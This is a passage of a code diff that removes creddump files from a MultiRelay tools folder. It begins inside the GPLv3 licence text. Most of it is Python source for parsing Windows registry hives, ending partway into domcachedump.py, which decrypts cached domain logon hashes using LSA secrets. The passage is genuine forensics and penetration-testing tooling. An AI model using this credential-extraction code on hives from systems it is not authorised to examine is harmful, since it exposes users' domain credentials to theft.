-(including a cross-claim or counterclaim in a lawsuit) alleging that
-any patent claim is infringed by making, using, selling, offering for
-sale, or importing the Program or any portion of it.
-
-  11. Patents.
-
-  A "contributor" is a copyright holder who authorizes use under this
-License of the Program or a work on which the Program is based.  The
-work thus licensed is called the contributor's "contributor version".
-
-  A contributor's "essential patent claims" are all patent claims
-owned or controlled by the contributor, whether already acquired or
-hereafter acquired, that would be infringed by some manner, permitted
-by this License, of making, using, or selling its contributor version,
-but do not include claims that would be infringed only as a
-consequence of further modification of the contributor version.  For
-purposes of this definition, "control" includes the right to grant
-patent sublicenses in a manner consistent with the requirements of
-this License.
-
-  Each contributor grants you a non-exclusive, worldwide, royalty-free
-patent license under the contributor's essential patent claims, to
-make, use, sell, offer for sale, import and otherwise run, modify and
-propagate the contents of its contributor version.
-
-  In the following three paragraphs, a "patent license" is any express
-agreement or commitment, however denominated, not to enforce a patent
-(such as an express permission to practice a patent or covenant not to
-sue for patent infringement).  To "grant" such a patent license to a
-party means to make such an agreement or commitment not to enforce a
-patent against the party.
-
-  If you convey a covered work, knowingly relying on a patent license,
-and the Corresponding Source of the work is not available for anyone
-to copy, free of charge and under the terms of this License, through a
-publicly available network server or other readily accessible means,
-then you must either (1) cause the Corresponding Source to be so
-available, or (2) arrange to deprive yourself of the benefit of the
-patent license for this particular work, or (3) arrange, in a manner
-consistent with the requirements of this License, to extend the patent
-license to downstream recipients.  "Knowingly relying" means you have
-actual knowledge that, but for the patent license, your conveying the
-covered work in a country, or your recipient's use of the covered work
-in a country, would infringe one or more identifiable patents in that
-country that you have reason to believe are valid.
-
-  If, pursuant to or in connection with a single transaction or
-arrangement, you convey, or propagate by procuring conveyance of, a
-covered work, and grant a patent license to some of the parties
-receiving the covered work authorizing them to use, propagate, modify
-or convey a specific copy of the covered work, then the patent license
-you grant is automatically extended to all recipients of the covered
-work and works based on it.
-
-  A patent license is "discriminatory" if it does not include within
-the scope of its coverage, prohibits the exercise of, or is
-conditioned on the non-exercise of one or more of the rights that are
-specifically granted under this License.  You may not convey a covered
-work if you are a party to an arrangement with a third party that is
-in the business of distributing software, under which you make payment
-to the third party based on the extent of your activity of conveying
-the work, and under which the third party grants, to any of the
-parties who would receive the covered work from you, a discriminatory
-patent license (a) in connection with copies of the covered work
-conveyed by you (or copies made from those copies), or (b) primarily
-for and in connection with specific products or compilations that
-contain the covered work, unless you entered into that arrangement,
-or that patent license was granted, prior to 28 March 2007.
-
-  Nothing in this License shall be construed as excluding or limiting
-any implied license or other defenses to infringement that may
-otherwise be available to you under applicable patent law.
-
-  12. No Surrender of Others' Freedom.
-
-  If conditions are imposed on you (whether by court order, agreement or
-otherwise) that contradict the conditions of this License, they do not
-excuse you from the conditions of this License.  If you cannot convey a
-covered work so as to satisfy simultaneously your obligations under this
-License and any other pertinent obligations, then as a consequence you may
-not convey it at all.  For example, if you agree to terms that obligate you
-to collect a royalty for further conveying from those to whom you convey
-the Program, the only way you could satisfy both those terms and this
-License would be to refrain entirely from conveying the Program.
-
-  13. Use with the GNU Affero General Public License.
-
-  Notwithstanding any other provision of this License, you have
-permission to link or combine any covered work with a work licensed
-under version 3 of the GNU Affero General Public License into a single
-combined work, and to convey the resulting work.  The terms of this
-License will continue to apply to the part which is the covered work,
-but the special requirements of the GNU Affero General Public License,
-section 13, concerning interaction through a network will apply to the
-combination as such.
-
-  14. Revised Versions of this License.
-
-  The Free Software Foundation may publish revised and/or new versions of
-the GNU General Public License from time to time.  Such new versions will
-be similar in spirit to the present version, but may differ in detail to
-address new problems or concerns.
-
-  Each version is given a distinguishing version number.  If the
-Program specifies that a certain numbered version of the GNU General
-Public License "or any later version" applies to it, you have the
-option of following the terms and conditions either of that numbered
-version or of any later version published by the Free Software
-Foundation.  If the Program does not specify a version number of the
-GNU General Public License, you may choose any version ever published
-by the Free Software Foundation.
-
-  If the Program specifies that a proxy can decide which future
-versions of the GNU General Public License can be used, that proxy's
-public statement of acceptance of a version permanently authorizes you
-to choose that version for the Program.
-
-  Later license versions may give you additional or different
-permissions.  However, no additional obligations are imposed on any
-author or copyright holder as a result of your choosing to follow a
-later version.
-
-  15. Disclaimer of Warranty.
-
-  THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
-APPLICABLE LAW.  EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
-HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
-OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
-THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
-PURPOSE.  THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
-IS WITH YOU.  SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
-ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
-
-  16. Limitation of Liability.
-
-  IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
-WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
-THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
-GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
-USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
-DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
-PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
-EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
-SUCH DAMAGES.
-
-  17. Interpretation of Sections 15 and 16.
-
-  If the disclaimer of warranty and limitation of liability provided
-above cannot be given local legal effect according to their terms,
-reviewing courts shall apply local law that most closely approximates
-an absolute waiver of all civil liability in connection with the
-Program, unless a warranty or assumption of liability accompanies a
-copy of the Program in return for a fee.
-
-                     END OF TERMS AND CONDITIONS
-
-            How to Apply These Terms to Your New Programs
-
-  If you develop a new program, and you want it to be of the greatest
-possible use to the public, the best way to achieve this is to make it
-free software which everyone can redistribute and change under these terms.
-
-  To do so, attach the following notices to the program.  It is safest
-to attach them to the start of each source file to most effectively
-state the exclusion of warranty; and each file should have at least
-the "copyright" line and a pointer to where the full notice is found.
-
-    <one line to give the program's name and a brief idea of what it does.>
-    Copyright (C) <year>  <name of author>
-
-    This program is free software: you can redistribute it and/or modify
-    it under the terms of the GNU General Public License as published by
-    the Free Software Foundation, either version 3 of the License, or
-    (at your option) any later version.
-
-    This program is distributed in the hope that it will be useful,
-    but WITHOUT ANY WARRANTY; without even the implied warranty of
-    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-    GNU General Public License for more details.
-
-    You should have received a copy of the GNU General Public License
-    along with this program.  If not, see <http://www.gnu.org/licenses/>.
-
-Also add information on how to contact you by electronic and paper mail.
-
-  If the program does terminal interaction, make it output a short
-notice like this when it starts in an interactive mode:
-
-    <program>  Copyright (C) <year>  <name of author>
-    This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
-    This is free software, and you are welcome to redistribute it
-    under certain conditions; type `show c' for details.
-
-The hypothetical commands `show w' and `show c' should show the appropriate
-parts of the General Public License.  Of course, your program's commands
-might be different; for a GUI interface, you would use an "about box".
-
-  You should also get your employer (if you work as a programmer) or school,
-if any, to sign a "copyright disclaimer" for the program, if necessary.
-For more information on this, and how to apply and follow the GNU GPL, see
-<http://www.gnu.org/licenses/>.
-
-  The GNU General Public License does not permit incorporating your program
-into proprietary programs.  If your program is a subroutine library, you
-may consider it more useful to permit linking proprietary applications with
-the library.  If this is what you want to do, use the GNU Lesser General
-Public License instead of this License.  But first, please read
-<http://www.gnu.org/philosophy/why-not-lgpl.html>.

tools/MultiRelay/creddump/cachedump.py

@@ -1,33 +0,0 @@
-#!/usr/bin/env python
-
-# This file is part of creddump.
-#
-# creddump is free software: you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation, either version 3 of the License, or
-# (at your option) any later version.
-#
-# creddump is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-# GNU General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with creddump.  If not, see <http://www.gnu.org/licenses/>.
-
-"""
-@author:       Brendan Dolan-Gavitt
-@license:      GNU General Public License 2.0 or later
-@contact:      bdolangavitt@wesleyan.edu
-"""
-
-
-import sys
-from framework.win32.domcachedump import dump_file_hashes
-
-if len(sys.argv) < 3:
-    print "usage: %s bootkey <security hive>" % sys.argv[0]
-    sys.exit(1)
-
-dump_file_hashes(sys.argv[1].decode("hex"), sys.argv[2])
-

tools/MultiRelay/creddump/framework/addrspace.py

@@ -1,141 +0,0 @@
-# Volatility
-# Copyright (C) 2007 Volatile Systems
-#
-# Original Source:
-# Copyright (C) 2004,2005,2006 4tphi Research
-# Author: {npetroni,awalters}@4tphi.net (Nick Petroni and AAron Walters)
-#
-# This program is free software; you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation; either version 2 of the License, or (at
-# your option) any later version.
-#
-# This program is distributed in the hope that it will be useful, but
-# WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
-# General Public License for more details. 
-#
-# You should have received a copy of the GNU General Public License
-# along with this program; if not, write to the Free Software
-# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 
-#
-
-"""
-@author:       AAron Walters
-@license:      GNU General Public License 2.0 or later
-@contact:      awalters@volatilesystems.com
-@organization: Volatile Systems
-"""
-
-""" Alias for all address spaces """
-
-import os
-import struct
-
-class FileAddressSpace:
-    def __init__(self, fname, mode='rb', fast=False):
-        self.fname = fname
-	self.name = fname
-	self.fhandle = open(fname, mode)
-        self.fsize = os.path.getsize(fname)
-
-	if fast == True:
-            self.fast_fhandle = open(fname, mode)
-
-    def fread(self,len):
-        return self.fast_fhandle.read(len)
-
-    def read(self, addr, len):
-        self.fhandle.seek(addr)        
-        return self.fhandle.read(len)    
-
-    def read_long(self, addr):
-        string = self.read(addr, 4)
-        (longval, ) =  struct.unpack('L', string)
-        return longval
-
-    def get_address_range(self):
-        return [0,self.fsize-1]
-
-    def get_available_addresses(self):
-        return [self.get_address_range()]
-
-    def is_valid_address(self, addr):
-        return addr < self.fsize - 1
-
-    def close():
-        self.fhandle.close()
-
-# Code below written by Brendan Dolan-Gavitt
-
-BLOCK_SIZE = 0x1000
-
-class HiveFileAddressSpace:
-    def __init__(self, fname):
-        self.fname = fname
-        self.base = FileAddressSpace(fname)
-
-    def vtop(self, vaddr):
-        return vaddr + BLOCK_SIZE + 4
-
-    def read(self, vaddr, length, zero=False):
-        first_block = BLOCK_SIZE - vaddr % BLOCK_SIZE
-        full_blocks = ((length + (vaddr % BLOCK_SIZE)) / BLOCK_SIZE) - 1
-        left_over = (length + vaddr) % BLOCK_SIZE
-        
-        paddr = self.vtop(vaddr)
-        if paddr == None and zero:
-            if length < first_block:
-                return "\0" * length
-            else:
-                stuff_read = "\0" * first_block
-        elif paddr == None:
-            return None
-        else:
-            if length < first_block:
-                stuff_read = self.base.read(paddr, length)
-                if not stuff_read and zero:
-                    return "\0" * length
-                else:
-                    return stuff_read
-
-            stuff_read = self.base.read(paddr, first_block)
-            if not stuff_read and zero:
-                stuff_read = "\0" * first_block
-
-        new_vaddr = vaddr + first_block
-        for i in range(0,full_blocks):
-            paddr = self.vtop(new_vaddr)
-            if paddr == None and zero:
-                stuff_read = stuff_read + "\0" * BLOCK_SIZE
-            elif paddr == None:
-                return None
-            else:
-                new_stuff = self.base.read(paddr, BLOCK_SIZE)
-                if not new_stuff and zero:
-                    new_stuff = "\0" * BLOCK_SIZE
-                elif not new_stuff:
-                    return None
-                else:
-                    stuff_read = stuff_read + new_stuff
-            new_vaddr = new_vaddr + BLOCK_SIZE
-
-        if left_over > 0:
-            paddr = self.vtop(new_vaddr)
-            if paddr == None and zero:
-                stuff_read = stuff_read + "\0" * left_over
-            elif paddr == None:
-                return None
-            else:
-                stuff_read = stuff_read + self.base.read(paddr, left_over)
-        return stuff_read
-
-    def read_long_phys(self, addr):
-        string = self.base.read(addr, 4)
-        (longval, ) =  struct.unpack('L', string)
-        return longval
-
-    def is_valid_address(self, vaddr):
-        paddr = self.vtop(vaddr)
-        if not paddr: return False
-        return self.base.is_valid_address(paddr)

tools/MultiRelay/creddump/framework/newobj.py

@@ -1,301 +0,0 @@
-# This file is part of creddump.
-#
-# creddump is free software: you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation, either version 3 of the License, or
-# (at your option) any later version.
-#
-# creddump is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-# GNU General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with creddump.  If not, see <http://www.gnu.org/licenses/>.
-
-"""
-@author:       Brendan Dolan-Gavitt
-@license:      GNU General Public License 2.0 or later
-@contact:      bdolangavitt@wesleyan.edu
-"""
-
-from framework.object import *
-from framework.types import regtypes as types
-from operator import itemgetter
-from struct import unpack
-
-def get_ptr_type(structure, member):
-    """Return the type a pointer points to.
-       
-       Arguments:
-         structure : the name of the structure from vtypes
-         member : a list of members
-
-       Example:
-         get_ptr_type('_EPROCESS', ['ActiveProcessLinks', 'Flink']) => ['_LIST_ENTRY']
-    """
-    if len(member) > 1:
-        _, tp = get_obj_offset(types, [structure, member[0]])
-        if tp == 'array':
-            return types[structure][1][member[0]][1][2][1]
-        else:
-            return get_ptr_type(tp, member[1:])
-    else:
-        return types[structure][1][member[0]][1][1]
-
-class Obj(object):
-    """Base class for all objects.
-       
-       May return a subclass for certain data types to allow
-       for special handling.
-    """
-
-    def __new__(typ, name, address, space):
-        if name in globals():
-            # This is a bit of "magic"
-            # Could be replaced with a dict mapping type names to types
-            return globals()[name](name,address,space)
-        elif name in builtin_types:
-            return Primitive(name, address, space)
-        else:
-            obj = object.__new__(typ)
-            return obj
-    
-    def __init__(self, name, address, space):
-        self.name = name
-        self.address = address
-        self.space = space
-
-        # Subclasses can add fields to this list if they want them
-        # to show up in values() or members(), even if they do not
-        # appear in the vtype definition
-        self.extra_members = []
-    
-    def __getattribute__(self, attr):
-        try:
-            return object.__getattribute__(self, attr)
-        except AttributeError:
-            pass
-
-        if self.name in builtin_types:
-            raise AttributeError("Primitive types have no dynamic attributes")
-
-        try:
-            off, tp = get_obj_offset(types, [self.name, attr])
-        except:
-            raise AttributeError("'%s' has no attribute '%s'" % (self.name, attr))
-        
-        if tp == 'array':
-            a_len = types[self.name][1][attr][1][1]
-            l = []
-            for i in range(a_len):
-                a_off, a_tp = get_obj_offset(types, [self.name, attr, i])
-                if a_tp == 'pointer':
-                    ptp = get_ptr_type(self.name, [attr, i])
-                    l.append(Pointer(a_tp, self.address+a_off, self.space, ptp))
-                else:
-                    l.append(Obj(a_tp, self.address+a_off, self.space))
-            return l
-        elif tp == 'pointer':
-            # Can't just return a Obj here, since pointers need to also
-            # know what type they point to.
-            ptp = get_ptr_type(self.name, [attr])
-            return Pointer(tp, self.address+off, self.space, ptp)
-        else:
-            return Obj(tp, self.address+off, self.space)
-    
-    def __div__(self, other):
-        if isinstance(other,tuple) or isinstance(other,list):
-            return Pointer(other[0], self.address, self.space, other[1])
-        elif isinstance(other,str):
-            return Obj(other, self.address, self.space)
-        else:
-            raise ValueError("Must provide a type name as string for casting")
-    
-    def members(self):
-        """Return a list of this object's members, sorted by offset."""
-
-        # Could also just return the list
-        membs = [ (k, v[0]) for k,v in types[self.name][1].items()]
-        membs.sort(key=itemgetter(1))
-        return map(itemgetter(0),membs) + self.extra_members
-
-    def values(self):
-        """Return a dictionary of this object's members and their values"""
-        
-        valdict = {}
-        for k in self.members():
-            valdict[k] = getattr(self, k)
-        return valdict
-
-    def bytes(self, length=-1):
-        """Get bytes starting at the address of this object.
-        
-           Arguments:
-             length : the number of bytes to read. Default: size of
-                this object.
-        """
-
-        if length == -1:
-            length = self.size()
-        return self.space.read(self.address, length)
-
-    def size(self):
-        """Get the size of this object."""
-
-        if self.name in builtin_types:
-            return builtin_types[self.name][0]
-        else:
-            return types[self.name][0]
-    
-    def __repr__(self):
-        return "<%s @%08x>" % (self.name, self.address)
-
-    def __eq__(self, other):
-        if not isinstance(other, Obj):
-            raise TypeError("Types are incomparable")
-        return self.address == other.address and self.name == other.name
-
-    def __ne__(self, other):
-        return not self.__eq__(other)
-
-    def __hash__(self):
-        return hash(self.address) ^ hash(self.name)
-
-    def is_valid(self):
-        return self.space.is_valid_address(self.address)
-
-    def get_offset(self, member):
-        return get_obj_offset(types, [self.name] + member)
-
-class Primitive(Obj):
-    """Class to represent a primitive data type.
-       
-       Attributes:
-         value : the python primitive value of this type
-    """
-
-    def __new__(typ, *args, **kwargs):
-        obj = object.__new__(typ)
-        return obj
-
-    def __init__(self, name, address, space):
-        super(Primitive,self).__init__(name, address, space)
-        length, fmt = builtin_types[name]
-        data = space.read(address,length)
-        if not data: self.value = None
-        else: self.value = unpack(fmt,data)[0]
-    
-    def __repr__(self):
-        return repr(self.value)
-
-    def members(self):
-        return []
-
-class Pointer(Obj):
-    """Class to represent pointers.
-    
-       value : the object pointed to
-
-       If an attribute is not found in this instance,
-       the attribute will be looked up in the referenced
-       object."""
-
-    def __new__(typ, *args, **kwargs):
-        obj = object.__new__(typ)
-        return obj
-
-    def __init__(self, name, address, space, ptr_type):
-        super(Pointer,self).__init__(name, address, space)
-        ptr_address = read_value(space, name, address)
-        if ptr_type[0] == 'pointer':
-            self.value = Pointer(ptr_type[0], ptr_address, self.space, ptr_type[1])
-        else:
-            self.value = Obj(ptr_type[0], ptr_address, self.space)
-    
-    def __getattribute__(self, attr):
-        # It's still nice to be able to access things through pointers
-        # without having to explicitly dereference them, so if we don't
-        # find an attribute via our superclass, just dereference the pointer
-        # and return the attribute in the pointed-to type.
-        try:
-            return super(Pointer,self).__getattribute__(attr)
-        except AttributeError:
-            return getattr(self.value, attr)
-    
-    def __repr__(self):
-        return "<pointer to [%s @%08x]>" % (self.value.name, self.value.address)
-
-    def members(self):
-        return self.value.members()
-
-class _UNICODE_STRING(Obj):
-    """Class representing a _UNICODE_STRING
-
-    Adds the following behavior:
-      * The Buffer attribute is presented as a Python string rather
-        than a pointer to an unsigned short.
-      * The __str__ method returns the value of the Buffer.
-    """
-
-    def __new__(typ, *args, **kwargs):
-        obj = object.__new__(typ)
-        return obj
-
-    def __str__(self):
-        return self.Buffer
-
-    # Custom Attributes
-    def getBuffer(self):
-        return read_unicode_string(self.space, types, [], self.address)
-    Buffer = property(fget=getBuffer)
-
-class _CM_KEY_NODE(Obj):
-    def __new__(typ, *args, **kwargs):
-        obj = object.__new__(typ)
-        return obj
-
-    def getName(self):
-        return read_string(self.space, types, ['_CM_KEY_NODE', 'Name'],
-            self.address, self.NameLength.value)
-    Name = property(fget=getName)
-
-class _CM_KEY_VALUE(Obj):
-    def __new__(typ, *args, **kwargs):
-        obj = object.__new__(typ)
-        return obj
-
-    def getName(self):
-        return read_string(self.space, types, ['_CM_KEY_VALUE', 'Name'],
-            self.address, self.NameLength.value)
-    Name = property(fget=getName)
-
-class _CHILD_LIST(Obj):
-    def __new__(typ, *args, **kwargs):
-        obj = object.__new__(typ)
-        return obj
-
-    def getList(self):
-        lst = []
-        list_address = read_obj(self.space, types,
-            ['_CHILD_LIST', 'List'], self.address)
-        for i in range(self.Count.value):
-            lst.append(Pointer("pointer", list_address+(i*4), self.space,
-                ["_CM_KEY_VALUE"]))
-        return lst
-    List = property(fget=getList)
-
-class _CM_KEY_INDEX(Obj):
-    def __new__(typ, *args, **kwargs):
-        obj = object.__new__(typ)
-        return obj
-
-    def getList(self):
-        lst = []
-        for i in range(self.Count.value):
-            # we are ignoring the hash value here
-            off,tp = get_obj_offset(types, ['_CM_KEY_INDEX', 'List', i*2])
-            lst.append(Pointer("pointer", self.address+off, self.space,
-                ["_CM_KEY_NODE"]))
-        return lst
-    List = property(fget=getList)

tools/MultiRelay/creddump/framework/object.py

@@ -1,171 +0,0 @@
-# Volatools Basic
-# Copyright (C) 2007 Komoku, Inc.
-#
-# This program is free software; you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation; either version 2 of the License, or (at
-# your option) any later version.
-#
-# This program is distributed in the hope that it will be useful, but
-# WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
-# General Public License for more details. 
-#
-# You should have received a copy of the GNU General Public License
-# along with this program; if not, write to the Free Software
-# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 
-#
-
-"""
-@author:       AAron Walters and Nick Petroni
-@license:      GNU General Public License 2.0 or later
-@contact:      awalters@komoku.com, npetroni@komoku.com
-@organization: Komoku, Inc.
-"""
-
-import struct
-
-builtin_types = { \
-    'int' : (4, 'i'), \
-    'long': (4, 'i'), \
-    'unsigned long' : (4, 'I'), \
-    'unsigned int' : (4, 'I'), \
-    'address' : (4, 'I'), \
-    'char' : (1, 'c'), \
-    'unsigned char' : (1, 'B'), \
-    'unsigned short' : (2, 'H'), \
-    'short' : (2, 'h'), \
-    'long long' : (8, 'q'), \
-    'unsigned long long' : (8, 'Q'), \
-    'pointer' : (4, 'I'),\
-    }
-
-
-def obj_size(types, objname):
-    if not types.has_key(objname):
-        raise Exception('Invalid type %s not in types' % (objname))
-
-    return types[objname][0]
-
-def builtin_size(builtin):
-    if not builtin_types.has_key(builtin):
-        raise Exception('Invalid built-in type %s' % (builtin))
-
-    return builtin_types[builtin][0]
-
-def read_value(addr_space, value_type, vaddr):
-    """
-    Read the low-level value for a built-in type. 
-    """
-
-    if not builtin_types.has_key(value_type):
-        raise Exception('Invalid built-in type %s' % (value_type))
-
-    type_unpack_char = builtin_types[value_type][1]
-    type_size        = builtin_types[value_type][0]
-
-    buf = addr_space.read(vaddr, type_size)
-    if buf is None:
-        return None
-    (val, ) = struct.unpack(type_unpack_char, buf)
-
-    return val
-
-def read_unicode_string(addr_space, types, member_list, vaddr):
-    offset = 0
-    if len(member_list) > 1:
-        (offset, current_type) = get_obj_offset(types, member_list)
-
-
-    buf    = read_obj(addr_space, types, ['_UNICODE_STRING', 'Buffer'], vaddr + offset)
-    length = read_obj(addr_space, types, ['_UNICODE_STRING', 'Length'], vaddr + offset)
-
-    if length == 0x0:
-        return ""
-
-    if buf is None or length is None:
-        return None
-
-    readBuf = read_string(addr_space, types, ['char'], buf, length)
-
-    if readBuf is None:
-        return None
-    
-    try:
-        readBuf = readBuf.decode('UTF-16').encode('ascii')
-    except:
-        return None
-    
-    return readBuf
-
-def read_string(addr_space, types, member_list, vaddr, max_length=256):
-    offset = 0
-    if len(member_list) > 1:
-        (offset, current_type) = get_obj_offset(types, member_list)
-
-    val = addr_space.read(vaddr + offset, max_length)
-
-    return val    
-    
-
-def read_null_string(addr_space, types, member_list, vaddr, max_length=256):
-    string = read_string(addr_space, types, member_list, vaddr, max_length)
-
-    if string is None:
-        return None
-
-    if (string.find('\0') == -1):
-        return string
-    (string, none) = string.split('\0', 1)
-    return string
-        
-
-def get_obj_offset(types, member_list):
-    """
-    Returns the (offset, type) pair for a given list
-    """
-    member_list.reverse()
-
-    current_type = member_list.pop()
-
-    offset = 0
-
-    while (len(member_list) > 0):
-        if current_type == 'array':
-            current_type = member_dict[current_member][1][2][0]
-            if current_type in builtin_types:
-                current_type_size = builtin_size(current_type)
-            else:
-                current_type_size = obj_size(types, current_type)
-            index = member_list.pop()
-            offset += index * current_type_size
-            continue
-            
-        elif not types.has_key(current_type):
-            raise Exception('Invalid type ' + current_type)
-        
-        member_dict = types[current_type][1]
-        
-        current_member = member_list.pop()
-        if not member_dict.has_key(current_member):
-            raise Exception('Invalid member %s in type %s' % (current_member, current_type))
-
-        offset += member_dict[current_member][0]
-
-        current_type = member_dict[current_member][1][0]
-
-    return (offset, current_type)
-
-
-def read_obj(addr_space, types, member_list, vaddr):
-    """
-    Read the low-level value for some complex type's member.
-    The type must have members.
-    """
-    if len(member_list) < 2:
-        raise Exception('Invalid type/member ' + str(member_list))
-    
-
-    
-    (offset, current_type) = get_obj_offset(types, member_list)
-    return read_value(addr_space, current_type, vaddr + offset)

tools/MultiRelay/creddump/framework/types.py

@@ -1,63 +0,0 @@
-# This file is part of creddump.
-#
-# creddump is free software: you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation, either version 3 of the License, or
-# (at your option) any later version.
-#
-# creddump is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-# GNU General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with creddump.  If not, see <http://www.gnu.org/licenses/>.
-
-"""
-@author:       Brendan Dolan-Gavitt
-@license:      GNU General Public License 2.0 or later
-@contact:      bdolangavitt@wesleyan.edu
-"""
-
-regtypes = {
-  '_CM_KEY_VALUE' : [ 0x18, {
-    'Signature' : [ 0x0, ['unsigned short']],
-    'NameLength' : [ 0x2, ['unsigned short']],
-    'DataLength' : [ 0x4, ['unsigned long']],
-    'Data' : [ 0x8, ['unsigned long']],
-    'Type' : [ 0xc, ['unsigned long']],
-    'Flags' : [ 0x10, ['unsigned short']],
-    'Spare' : [ 0x12, ['unsigned short']],
-    'Name' : [ 0x14, ['array', 1, ['unsigned short']]],
-} ],
-  '_CM_KEY_NODE' : [ 0x50, {
-    'Signature' : [ 0x0, ['unsigned short']],
-    'Flags' : [ 0x2, ['unsigned short']],
-    'LastWriteTime' : [ 0x4, ['_LARGE_INTEGER']],
-    'Spare' : [ 0xc, ['unsigned long']],
-    'Parent' : [ 0x10, ['unsigned long']],
-    'SubKeyCounts' : [ 0x14, ['array', 2, ['unsigned long']]],
-    'SubKeyLists' : [ 0x1c, ['array', 2, ['unsigned long']]],
-    'ValueList' : [ 0x24, ['_CHILD_LIST']],
-    'ChildHiveReference' : [ 0x1c, ['_CM_KEY_REFERENCE']],
-    'Security' : [ 0x2c, ['unsigned long']],
-    'Class' : [ 0x30, ['unsigned long']],
-    'MaxNameLen' : [ 0x34, ['unsigned long']],
-    'MaxClassLen' : [ 0x38, ['unsigned long']],
-    'MaxValueNameLen' : [ 0x3c, ['unsigned long']],
-    'MaxValueDataLen' : [ 0x40, ['unsigned long']],
-    'WorkVar' : [ 0x44, ['unsigned long']],
-    'NameLength' : [ 0x48, ['unsigned short']],
-    'ClassLength' : [ 0x4a, ['unsigned short']],
-    'Name' : [ 0x4c, ['array', 1, ['unsigned short']]],
-} ],
-  '_CM_KEY_INDEX' : [ 0x8, {
-    'Signature' : [ 0x0, ['unsigned short']],
-    'Count' : [ 0x2, ['unsigned short']],
-    'List' : [ 0x4, ['array', 1, ['unsigned long']]],
-} ],
-  '_CHILD_LIST' : [ 0x8, {
-    'Count' : [ 0x0, ['unsigned long']],
-    'List' : [ 0x4, ['unsigned long']],
-} ],
-}

tools/MultiRelay/creddump/framework/win32/domcachedump.py

@@ -1,117 +0,0 @@
-# This file is part of creddump.
-#
-# creddump is free software: you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation, either version 3 of the License, or
-# (at your option) any later version.
-#
-# creddump is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-# GNU General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with creddump.  If not, see <http://www.gnu.org/licenses/>.
-
-"""
-@author:       Brendan Dolan-Gavitt
-@license:      GNU General Public License 2.0 or later
-@contact:      bdolangavitt@wesleyan.edu
-"""
-
-from framework.win32.rawreg import *
-from framework.addrspace import HiveFileAddressSpace
-#from framework.win32.hashdump import get_bootkey
-from framework.win32.lsasecrets import get_secret_by_name,get_lsa_key
-from Crypto.Hash import HMAC
-from Crypto.Cipher import ARC4
-from struct import unpack
-
-def get_nlkm(secaddr, lsakey):
-    return get_secret_by_name(secaddr, 'NL$KM', lsakey)
-
-def decrypt_hash(edata, nlkm, ch):
-    hmac_md5 = HMAC.new(nlkm,ch)
-    rc4key = hmac_md5.digest()
-
-    rc4 = ARC4.new(rc4key)
-    data = rc4.encrypt(edata)
-    return data
-
-def parse_cache_entry(cache_data):
-    (uname_len, domain_len) = unpack("<HH", cache_data[:4])
-    (domain_name_len,) = unpack("<H", cache_data[60:62])
-    ch = cache_data[64:80]
-    enc_data = cache_data[96:]
-    return (uname_len, domain_len, domain_name_len, enc_data, ch) 
-
-def parse_decrypted_cache(dec_data, uname_len,
-        domain_len, domain_name_len):
-    uname_off = 72
-    pad = 2 * ( ( uname_len / 2 ) % 2 )
-    domain_off = uname_off + uname_len + pad
-    pad = 2 * ( ( domain_len / 2 ) % 2 )
-    domain_name_off = domain_off + domain_len + pad
-
-    hash = dec_data[:0x10]
-    username = dec_data[uname_off:uname_off+uname_len]
-    username = username.decode('utf-16-le')
-    domain = dec_data[domain_off:domain_off+domain_len]
-    domain = domain.decode('utf-16-le')
-    domain_name = dec_data[domain_name_off:domain_name_off+domain_name_len]
-    domain_name = domain_name.decode('utf-16-le')
-
